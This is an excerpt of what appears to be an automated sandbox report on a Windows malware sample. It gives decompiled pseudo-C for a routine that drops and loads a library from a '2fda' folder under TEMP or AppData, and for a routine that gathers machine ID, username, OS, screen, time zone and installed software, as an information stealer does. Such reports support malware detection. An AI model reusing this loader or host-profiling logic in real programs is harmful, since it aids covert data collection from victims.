					_t80 =  *0x41b2a4; // 0x41c9a8
					 *0x41ca34 = GetProcAddress( *0x41ca58, E00403990( *_t80));
					_t85 =  *0x41b328; // 0x41c9ac
					 *0x41ca38 = GetProcAddress( *0x41ca58, E00403990( *_t85));
					_t90 =  *0x41b318; // 0x41c7d8
					 *0x41ca3c = GetProcAddress( *0x41ca58, E00403990( *_t90));
					_t95 =  *0x41b2bc; // 0x41c7dc
					 *0x41ca40 = GetProcAddress( *0x41ca58, E00403990( *_t95));
					_t100 =  *0x41b408; // 0x41c7e0
					 *0x41ca44 = GetProcAddress( *0x41ca58, E00403990( *_t100));
					_t105 =  *0x41b3b8; // 0x41c7e4
					 *0x41ca48 = GetProcAddress( *0x41ca58, E00403990( *_t105));
					_t110 =  *0x41b2f0; // 0x41c7e8
					 *0x41ca4c = GetProcAddress( *0x41ca58, E00403990( *_t110));
					_t115 =  *0x41b48c; // 0x41c7ec
					 *0x41ca50 = GetProcAddress( *0x41ca58, E00403990( *_t115));
					if( *0x41ca20 != 0 &&  *0x41ca24 != 0 &&  *0x41ca28 != 0 &&  *0x41ca2c != 0 &&  *0x41ca30 != 0 &&  *0x41ca34 != 0 &&  *0x41ca38 != 0 &&  *0x41ca3c != 0 &&  *0x41ca40 != 0 &&  *0x41ca44 != 0 &&  *0x41ca48 != 0 &&  *0x41ca4c != 0 &&  *0x41ca50 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t144);
				 *[fs:eax] = _t144;
				_push(E0040996A);
				E00403BF4( &_v24, 4);
				return E004034E4( &_v8);
			}

0x0040965e
0x00409660
0x00409662
0x00409664
0x00409665
0x00409667
0x00409667
0x00409667
0x0040966d
0x0040966e
0x0040966f
0x00409670
0x00409671
0x00409672
0x00409674
0x0040967a
0x0040968b
0x0040968c
0x00409691
0x00409694
0x00409697
0x004096a6
0x004096b0
0x004096bf
0x004096c9
0x004096ce
0x004096db
0x004096e3
0x004096e8
0x004096ea
0x004096f4
0x004096fe
0x0040970d
0x00409717
0x00409717
0x00409729
0x00409730
0x0040973a
0x00409741
0x00409747
0x00409754
0x00409767
0x0040976c
0x00409772
0x00409787
0x0040978c
0x004097a1
0x004097a6
0x004097bb
0x004097c0
0x004097d5
0x004097da
0x004097ef
0x004097f4
0x00409809
0x0040980e
0x00409823
0x00409828
0x0040983d
0x00409842
0x00409857
0x0040985c
0x00409871
0x00409876
0x0040988b
0x00409890
0x004098a5
0x004098aa
0x004098bf
0x004098cb
0x00409939
0x00409939
0x004098cb
0x00409942
0x00409945
0x00409948
0x00409955
0x00409962

APIs

Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA

Strings

%TEMP%\2fda\, xrefs: 004096A1
%appdata%\2fda\, xrefs: 004096EF
PATH, xrefs: 00409724

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$AllocLibraryLoadString
String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
API String ID: 763169861-1556614757
Opcode ID: 3dabca578a80f5a72b4bbe57d97a85dc37324ae0374c3875346d0a4ab4ac3a91
Instruction ID: 26d77c896aabed61a2775ccb06ba61d1ee422efe4d6d96ca95dbfc380ed6e43d
Opcode Fuzzy Hash: 3dabca578a80f5a72b4bbe57d97a85dc37324ae0374c3875346d0a4ab4ac3a91
Instruction Fuzzy Hash: DA91D9B06402049FD712EF69D885B9A37E8BF4A349F00847AF404EB7A6C778AD44CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00409664, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 230
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00409664(char __eax, void* __ebx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v117;
				void* _t33;
				intOrPtr* _t36;
				intOrPtr* _t41;
				intOrPtr* _t54;
				intOrPtr* _t59;
				intOrPtr* _t64;
				intOrPtr* _t69;
				intOrPtr* _t74;
				intOrPtr* _t79;
				intOrPtr* _t84;
				intOrPtr* _t89;
				intOrPtr* _t94;
				intOrPtr* _t99;
				intOrPtr* _t104;
				intOrPtr* _t109;
				intOrPtr* _t114;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr _t143;
				intOrPtr _t152;
				intOrPtr _t153;

				asm("das");
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_t1 =  &_v117;
				 *_t1 = _v117 + __edx;
				_t153 =  *_t1;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t152);
				_push(0x409963);
				_push( *[fs:eax]);
				 *[fs:eax] = _t152;
				 *0x41b0d8 = 0;
				E004062FC(L"%TEMP%\\2fda\\",  &_v12, _t153);
				E00403C18(0x41ca5c, _v12);
				CreateDirectoryW(E00403D98( *0x41ca5c), 0);
				E004094E0( *0x41ca5c, 0x41ca58, _v8, 0x41ca5c, _t153);
				_t131 =  *0x41b3c4; // 0x41c7ac
				E00403E14( &_v16,  *_t131,  *0x41ca5c, _t153);
				_t33 = E0040776C(_v16, 0x41ca58,  *_t131);
				_t154 = _t33;
				if(_t33 == 0) {
					E004062FC(L"%appdata%\\2fda\\",  &_v20, _t154);
					E00403C18(0x41ca5c, _v20);
					CreateDirectoryW(E00403D98( *0x41ca5c), 0);
					E004094E0( *0x41ca5c, 0x41ca58, _v8, 0x41ca5c, _t154);
				}
				_t36 =  *0x41b3ac; // 0x41c6ac
				 *((intOrPtr*)( *_t36))(L"PATH", E00403D98( *0x41ca5c));
				_t41 =  *0x41b320; // 0x41c6b0
				 *((intOrPtr*)( *_t41))(E00403D98( *0x41ca5c));
				_t133 =  *0x41b3c4; // 0x41c7ac
				E00403E14( &_v24,  *_t133,  *0x41ca5c, _t154);
				 *0x41ca58 = LoadLibraryExW(E00403D98(_v24), 0, 8);
				if( *0x41ca58 != 0) {
					_t54 =  *0x41b37c; // 0x41c994
					 *0x41ca20 = GetProcAddress( *0x41ca58, E00403990( *_t54));
					_t59 =  *0x41b42c; // 0x41c998
					 *0x41ca24 = GetProcAddress( *0x41ca58, E00403990( *_t59));
					_t64 =  *0x41b14c; // 0x41c99c
					 *0x41ca28 = GetProcAddress( *0x41ca58, E00403990( *_t64));
					_t69 =  *0x41b214; // 0x41c9a0
					 *0x41ca2c = GetProcAddress( *0x41ca58, E00403990( *_t69));
					_t74 =  *0x41b418; // 0x41c9a4
					 *0x41ca30 = GetProcAddress( *0x41ca58, E00403990( *_t74));
					_t79 =  *0x41b2a4; // 0x41c9a8
					 *0x41ca34 = GetProcAddress( *0x41ca58, E00403990( *_t79));
					_t84 =  *0x41b328; // 0x41c9ac
					 *0x41ca38 = GetProcAddress( *0x41ca58, E00403990( *_t84));
					_t89 =  *0x41b318; // 0x41c7d8
					 *0x41ca3c = GetProcAddress( *0x41ca58, E00403990( *_t89));
					_t94 =  *0x41b2bc; // 0x41c7dc
					 *0x41ca40 = GetProcAddress( *0x41ca58, E00403990( *_t94));
					_t99 =  *0x41b408; // 0x41c7e0
					 *0x41ca44 = GetProcAddress( *0x41ca58, E00403990( *_t99));
					_t104 =  *0x41b3b8; // 0x41c7e4
					 *0x41ca48 = GetProcAddress( *0x41ca58, E00403990( *_t104));
					_t109 =  *0x41b2f0; // 0x41c7e8
					 *0x41ca4c = GetProcAddress( *0x41ca58, E00403990( *_t109));
					_t114 =  *0x41b48c; // 0x41c7ec
					 *0x41ca50 = GetProcAddress( *0x41ca58, E00403990( *_t114));
					if( *0x41ca20 != 0 &&  *0x41ca24 != 0 &&  *0x41ca28 != 0 &&  *0x41ca2c != 0 &&  *0x41ca30 != 0 &&  *0x41ca34 != 0 &&  *0x41ca38 != 0 &&  *0x41ca3c != 0 &&  *0x41ca40 != 0 &&  *0x41ca44 != 0 &&  *0x41ca48 != 0 &&  *0x41ca4c != 0 &&  *0x41ca50 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t143);
				 *[fs:eax] = _t143;
				_push(E0040996A);
				E00403BF4( &_v24, 4);
				return E004034E4( &_v8);
			}

0x00409664
0x00409665
0x00409667
0x00409667
0x00409667
0x0040966d
0x0040966e
0x0040966f
0x00409670
0x00409671
0x00409672
0x00409674
0x0040967a
0x0040968b
0x0040968c
0x00409691
0x00409694
0x00409697
0x004096a6
0x004096b0
0x004096bf
0x004096c9
0x004096ce
0x004096db
0x004096e3
0x004096e8
0x004096ea
0x004096f4
0x004096fe
0x0040970d
0x00409717
0x00409717
0x00409729
0x00409730
0x0040973a
0x00409741
0x00409747
0x00409754
0x00409767
0x0040976c
0x00409772
0x00409787
0x0040978c
0x004097a1
0x004097a6
0x004097bb
0x004097c0
0x004097d5
0x004097da
0x004097ef
0x004097f4
0x00409809
0x0040980e
0x00409823
0x00409828
0x0040983d
0x00409842
0x00409857
0x0040985c
0x00409871
0x00409876
0x0040988b
0x00409890
0x004098a5
0x004098aa
0x004098bf
0x004098cb
0x00409939
0x00409939
0x004098cb
0x00409942
0x00409945
0x00409948
0x00409955
0x00409962

APIs

Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA

Strings

%TEMP%\2fda\, xrefs: 004096A1
%appdata%\2fda\, xrefs: 004096EF
PATH, xrefs: 00409724

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$AllocLibraryLoadString
String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
API String ID: 763169861-1556614757
Opcode ID: a16eaeec054c51931e14f5265a1c09e3020d9e051cf30a86899ec13f16d3cac9
Instruction ID: 5b3c55801863a32800eae0c5f30943bce4d4c5d0b2659c2e20ef893ba67f7cd3
Opcode Fuzzy Hash: a16eaeec054c51931e14f5265a1c09e3020d9e051cf30a86899ec13f16d3cac9
Instruction Fuzzy Hash: A991E8B06402049FD711EF69D885F9A37E8BF49349F00847AB404EB7A6C778AD44CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00409668, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 228
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00409668(char __eax, void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _t31;
				intOrPtr* _t34;
				intOrPtr* _t39;
				intOrPtr* _t52;
				intOrPtr* _t57;
				intOrPtr* _t62;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t77;
				intOrPtr* _t82;
				intOrPtr* _t87;
				intOrPtr* _t92;
				intOrPtr* _t97;
				intOrPtr* _t102;
				intOrPtr* _t107;
				intOrPtr* _t112;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr _t140;
				intOrPtr _t149;
				void* _t150;

				_t150 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t149);
				_push(0x409963);
				_push( *[fs:eax]);
				 *[fs:eax] = _t149;
				 *0x41b0d8 = 0;
				E004062FC(L"%TEMP%\\2fda\\",  &_v12, _t150);
				E00403C18(0x41ca5c, _v12);
				CreateDirectoryW(E00403D98( *0x41ca5c), 0);
				E004094E0( *0x41ca5c, 0x41ca58, _v8, 0x41ca5c, _t150);
				_t129 =  *0x41b3c4; // 0x41c7ac
				E00403E14( &_v16,  *_t129,  *0x41ca5c, _t150);
				_t31 = E0040776C(_v16, 0x41ca58,  *_t129);
				_t151 = _t31;
				if(_t31 == 0) {
					E004062FC(L"%appdata%\\2fda\\",  &_v20, _t151);
					E00403C18(0x41ca5c, _v20);
					CreateDirectoryW(E00403D98( *0x41ca5c), 0);
					E004094E0( *0x41ca5c, 0x41ca58, _v8, 0x41ca5c, _t151);
				}
				_t34 =  *0x41b3ac; // 0x41c6ac
				 *((intOrPtr*)( *_t34))(L"PATH", E00403D98( *0x41ca5c));
				_t39 =  *0x41b320; // 0x41c6b0
				 *((intOrPtr*)( *_t39))(E00403D98( *0x41ca5c));
				_t131 =  *0x41b3c4; // 0x41c7ac
				E00403E14( &_v24,  *_t131,  *0x41ca5c, _t151);
				 *0x41ca58 = LoadLibraryExW(E00403D98(_v24), 0, 8);
				if( *0x41ca58 != 0) {
					_t52 =  *0x41b37c; // 0x41c994
					 *0x41ca20 = GetProcAddress( *0x41ca58, E00403990( *_t52));
					_t57 =  *0x41b42c; // 0x41c998
					 *0x41ca24 = GetProcAddress( *0x41ca58, E00403990( *_t57));
					_t62 =  *0x41b14c; // 0x41c99c
					 *0x41ca28 = GetProcAddress( *0x41ca58, E00403990( *_t62));
					_t67 =  *0x41b214; // 0x41c9a0
					 *0x41ca2c = GetProcAddress( *0x41ca58, E00403990( *_t67));
					_t72 =  *0x41b418; // 0x41c9a4
					 *0x41ca30 = GetProcAddress( *0x41ca58, E00403990( *_t72));
					_t77 =  *0x41b2a4; // 0x41c9a8
					 *0x41ca34 = GetProcAddress( *0x41ca58, E00403990( *_t77));
					_t82 =  *0x41b328; // 0x41c9ac
					 *0x41ca38 = GetProcAddress( *0x41ca58, E00403990( *_t82));
					_t87 =  *0x41b318; // 0x41c7d8
					 *0x41ca3c = GetProcAddress( *0x41ca58, E00403990( *_t87));
					_t92 =  *0x41b2bc; // 0x41c7dc
					 *0x41ca40 = GetProcAddress( *0x41ca58, E00403990( *_t92));
					_t97 =  *0x41b408; // 0x41c7e0
					 *0x41ca44 = GetProcAddress( *0x41ca58, E00403990( *_t97));
					_t102 =  *0x41b3b8; // 0x41c7e4
					 *0x41ca48 = GetProcAddress( *0x41ca58, E00403990( *_t102));
					_t107 =  *0x41b2f0; // 0x41c7e8
					 *0x41ca4c = GetProcAddress( *0x41ca58, E00403990( *_t107));
					_t112 =  *0x41b48c; // 0x41c7ec
					 *0x41ca50 = GetProcAddress( *0x41ca58, E00403990( *_t112));
					if( *0x41ca20 != 0 &&  *0x41ca24 != 0 &&  *0x41ca28 != 0 &&  *0x41ca2c != 0 &&  *0x41ca30 != 0 &&  *0x41ca34 != 0 &&  *0x41ca38 != 0 &&  *0x41ca3c != 0 &&  *0x41ca40 != 0 &&  *0x41ca44 != 0 &&  *0x41ca48 != 0 &&  *0x41ca4c != 0 &&  *0x41ca50 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t140);
				 *[fs:eax] = _t140;
				_push(E0040996A);
				E00403BF4( &_v24, 4);
				return E004034E4( &_v8);
			}

0x00409668
0x0040966d
0x0040966e
0x0040966f
0x00409670
0x00409671
0x00409672
0x00409674
0x0040967a
0x0040968b
0x0040968c
0x00409691
0x00409694
0x00409697
0x004096a6
0x004096b0
0x004096bf
0x004096c9
0x004096ce
0x004096db
0x004096e3
0x004096e8
0x004096ea
0x004096f4
0x004096fe
0x0040970d
0x00409717
0x00409717
0x00409729
0x00409730
0x0040973a
0x00409741
0x00409747
0x00409754
0x00409767
0x0040976c
0x00409772
0x00409787
0x0040978c
0x004097a1
0x004097a6
0x004097bb
0x004097c0
0x004097d5
0x004097da
0x004097ef
0x004097f4
0x00409809
0x0040980e
0x00409823
0x00409828
0x0040983d
0x00409842
0x00409857
0x0040985c
0x00409871
0x00409876
0x0040988b
0x00409890
0x004098a5
0x004098aa
0x004098bf
0x004098cb
0x00409939
0x00409939
0x004098cb
0x00409942
0x00409945
0x00409948
0x00409955
0x00409962

APIs

Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA

Strings

%TEMP%\2fda\, xrefs: 004096A1
%appdata%\2fda\, xrefs: 004096EF
PATH, xrefs: 00409724

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$AllocLibraryLoadString
String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
API String ID: 763169861-1556614757
Opcode ID: ce2ff15e378b2bb7b4fef2ac6f55289aba182e4e6d2a742e5fc03b537afcb1c4
Instruction ID: 26c99af69019636de113f168175dae5416f6f3cc59ad43c6f3cb6d4c520b39b5
Opcode Fuzzy Hash: ce2ff15e378b2bb7b4fef2ac6f55289aba182e4e6d2a742e5fc03b537afcb1c4
Instruction Fuzzy Hash: A191D7B06402049FD711EF69D885F9A77E8BF49349F00847AB404EB7A6C778AD44CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00416974, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 213
sleepCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00416974(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				signed char _t59;
				intOrPtr* _t60;
				intOrPtr* _t142;
				void* _t143;
				intOrPtr _t173;
				void* _t181;
				intOrPtr _t184;
				intOrPtr _t185;

				_t182 = __esi;
				_t59 = __eax +  *__eax;
				 *_t59 =  *_t59 + _t59;
				asm("das");
				 *_t59 =  *_t59 + _t59;
				 *__edx =  *__edx + _t59;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 & _t59;
				 *_t59 =  *_t59 + _t59;
				_t60 = _t59 +  *_t59;
				 *_t60 =  *_t60 + _t60;
				 *_t60 =  *_t60 + _t60;
				_t184 = _t185;
				_t143 = 0xc;
				do {
					_push(0);
					_push(0);
					_t143 = _t143 - 1;
					_t191 = _t143;
				} while (_t143 != 0);
				_t142 = _t60;
				_push(_t184);
				_push(0x416c78);
				_push( *[fs:eax]);
				 *[fs:eax] = _t185;
				_push("MachineID :   ");
				E00406CE8( &_v8, _t142, __esi);
				_push(_v8);
				_push(0x416ca4);
				E00403850();
				_push( *_t142);
				_push("EXE_PATH  :   ");
				E00416684(0,  &_v12);
				_push(_v12);
				_push(0x416cc8);
				E00403850();
				_push( *_t142);
				_push("Windows    :   ");
				E00407B08( &_v28, _t142, _t181, __esi);
				_push(_v28);
				_push(0x416cf0);
				E00403850();
				E00403D88( &_v20, _v24);
				_push(_v20);
				E004066E4( &_v32, _t191);
				_push(_v32);
				_push(0x416cf8);
				E00406BD8( &_v36);
				_push(_v36);
				_push(0x416d00);
				E00403E78();
				E0040377C(_t142, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t142);
				E00403D88( &_v44, _v48);
				_push(_v44);
				E00406634( &_v52);
				_push(_v52);
				_push(0x416d2c);
				E004065F0( &_v56);
				_push(_v56);
				_push(0x416d34);
				_push(0x416d00);
				E00403E78();
				E0040377C(_t142, _v40);
				E004037DC( &_v68, "Screen: ",  *_t142);
				E00403D88( &_v64, _v68);
				_push(_v64);
				E0040709C(GetSystemMetrics(0), _t142,  &_v72, __esi, _t191);
				_push(_v72);
				_push(0x416d50);
				E0040709C(GetSystemMetrics(1), _t142,  &_v76, _t182, _t191);
				_push(_v76);
				_push(0x416d00);
				E00403E78();
				E0040377C(_t142, _v60);
				_push( *_t142);
				_push("Layouts: ");
				E004166B4( &_v80, _t142, _t181, _t182);
				_push(_v80);
				_push(0x416ca4);
				E00403850();
				_push( *_t142);
				_push("LocalTime: ");
				E00416894( &_v84, _t142, _t182);
				_push(_v84);
				_push(0x416ca4);
				E00403850();
				_push( *_t142);
				_push("Zone: ");
				E00416794( &_v88, _t142, _t181, _t182, _t191);
				_push(_v88);
				_push(0x416cc8);
				E00403850();
				_push( *_t142);
				E00415E44( &_v92, _t142, _t181, _t182);
				_push(_v92);
				_push(0x416cc8);
				E00403850();
				Sleep(1);
				_push( *_t142);
				E00416290( &_v96, _t142, _t181, _t182, _t191);
				_push(_v96);
				_push(0x416ca4);
				_push(0x416ca4);
				E00403850();
				Sleep(1);
				_push( *_t142);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E0041564C( &_v100, _t142, _t181, _t182);
				E00403798(_t142, _v100);
				_t173 = 0x416ca4;
				 *[fs:eax] = _t173;
				_push(E00416C7F);
				E00403508( &_v100, 6);
				E00403BF4( &_v76, 2);
				E004034E4( &_v68);
				E00403BF4( &_v64, 4);
				E004034E4( &_v48);
				E00403BF4( &_v44, 4);
				E00403508( &_v28, 2);
				E00403BF4( &_v20, 2);
				return E00403508( &_v12, 2);
			}

0x00416974
0x00416974
0x00416976
0x00416978
0x00416979
0x0041697b
0x0041697d
0x0041697f
0x00416980
0x00416982
0x00416984
0x00416986
0x0041698a
0x0041698d
0x0041698f
0x00416994
0x00416994
0x00416996
0x00416998
0x00416998
0x00416998
0x0041699c
0x004169a0
0x004169a1
0x004169a6
0x004169a9
0x004169ac
0x004169b4
0x004169b9
0x004169bc
0x004169c8
0x004169cd
0x004169cf
0x004169d9
0x004169de
0x004169e1
0x004169ed
0x004169f2
0x004169f4
0x004169fc
0x00416a01
0x00416a04
0x00416a11
0x00416a1c
0x00416a21
0x00416a27
0x00416a2c
0x00416a2f
0x00416a37
0x00416a3c
0x00416a3f
0x00416a4c
0x00416a56
0x00416a65
0x00416a70
0x00416a75
0x00416a7b
0x00416a80
0x00416a83
0x00416a8b
0x00416a90
0x00416a93
0x00416a98
0x00416aa5
0x00416aaf
0x00416abe
0x00416ac9
0x00416ace
0x00416adb
0x00416ae0
0x00416ae3
0x00416af2
0x00416af7
0x00416afa
0x00416b07
0x00416b11
0x00416b16
0x00416b18
0x00416b20
0x00416b25
0x00416b28
0x00416b34
0x00416b39
0x00416b3b
0x00416b43
0x00416b48
0x00416b4b
0x00416b57
0x00416b5c
0x00416b5e
0x00416b66
0x00416b6b
0x00416b6e
0x00416b7a
0x00416b7f
0x00416b84
0x00416b89
0x00416b8c
0x00416b98
0x00416b9f
0x00416ba4
0x00416ba9
0x00416bae
0x00416bb1
0x00416bb6
0x00416bc2
0x00416bc9
0x00416bce
0x00416bd0
0x00416be1
0x00416be8
0x00416bf0
0x00416bfa
0x00416c01
0x00416c04
0x00416c07
0x00416c14
0x00416c21
0x00416c29
0x00416c36
0x00416c3e
0x00416c4b
0x00416c58
0x00416c65
0x00416c77

APIs

GetSystemMetrics.USER32 ref: 00416AD3
GetSystemMetrics.USER32 ref: 00416AEA

Part of subcall function 00415E44: GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ,?,00416CA4,?,Layouts: ,?), ref: 00416B9F

Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
Part of subcall function 00416290: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379

Sleep.KERNEL32(00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ), ref: 00416BC9
Sleep.KERNEL32(00000001,00416CA4,[Soft],?,00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416BE8

Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

, xrefs: 004169E1, 00416B6E, 00416B8C
Layouts: , xrefs: 00416B18
Computer(Username) : , xrefs: 00416A60
MachineID : , xrefs: 004169AC
[Soft], xrefs: 00416BD0
Zone: , xrefs: 00416B5E
Screen: , xrefs: 00416AB9
EXE_PATH : , xrefs: 004169CF
Windows : , xrefs: 004169F4
LocalTime: , xrefs: 00416B3B

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: 60dc013b294cd3571c817187dd54daba4cfcc5ebfeb65134b18bef8d8193c09a
Instruction ID: 772785f2c09445a84a7b2349d24cb582ce7330fa6bd2b57fe2dee83489952c98
